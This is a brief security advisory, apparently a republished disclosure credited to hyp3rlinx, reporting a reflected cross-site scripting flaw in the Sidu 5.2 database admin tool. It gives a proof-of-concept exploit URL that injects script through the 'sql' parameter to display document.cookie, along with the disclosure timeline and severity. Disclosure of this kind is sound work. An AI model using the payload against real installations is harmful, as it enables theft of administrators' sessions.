Affected Vendor: www.topnew.net/sidu/ Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt Product: Sidu version 5.2 is a web based database front-end administration tool. Advisory Information: ===================================================== Sidu 5.2 is vulnerable to cross site scripting attacks. Exploit code: ============== http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E Disclosure Timeline: ================================== Vendor Notification May 12, 2015 May 13, 2015: Public Disclosure Severity Level: =============== High Description: ============ Request Method(s): [+] GET Vulnerable Product: [+] Sidu 5.2 Vulnerable Parameter(s): [+] sql=[XSS] Affected Area(s): [+] Admin of currently logged in user. ============================== (hyp3rlinx)
